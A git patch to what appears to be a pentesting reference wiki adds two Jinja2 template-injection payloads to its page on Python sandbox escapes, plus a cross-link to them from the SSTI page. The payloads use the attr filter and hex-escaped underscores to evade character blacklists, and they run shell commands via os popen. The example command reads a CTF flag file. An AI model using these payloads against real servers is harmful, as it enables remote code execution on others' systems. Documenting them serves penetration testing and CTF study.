From 02c26efb8d0d539349452b52f4572a834a7c7bbc Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 21 Feb 2021 10:52:17 +0000 Subject: [PATCH] GitBook: [master] 2 pages modified --- misc/basic-python/bypass-python-sandboxes.md | 4 ++++ pentesting-web/ssti-server-side-template-injection.md | 1 + 2 files changed, 5 insertions(+) diff --git a/misc/basic-python/bypass-python-sandboxes.md b/misc/basic-python/bypass-python-sandboxes.md index 24963120f..6408c7f06 100644 --- a/misc/basic-python/bypass-python-sandboxes.md +++ b/misc/basic-python/bypass-python-sandboxes.md @@ -205,6 +205,10 @@ get_flag.__globals__['__builtins__'].__import__("os").system("ls") # The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__) [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__ == '_wrap_close' ][0]['system']('ls') + +#If attr is present +(''|attr('___class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read() +(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read() ``` #### Python2 and Python3 diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md index 855141b62..86a225d5e 100644 --- a/pentesting-web/ssti-server-side-template-injection.md +++ b/pentesting-web/ssti-server-side-template-injection.md @@ -314,6 +314,7 @@ Django is going to be using as template engine **Jinja2**. #### More information * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2) +* Check [attr trick to bypass blacklisted chars in here](../misc/basic-python/bypass-python-sandboxes.md#python3). ### Razor \(.Net\)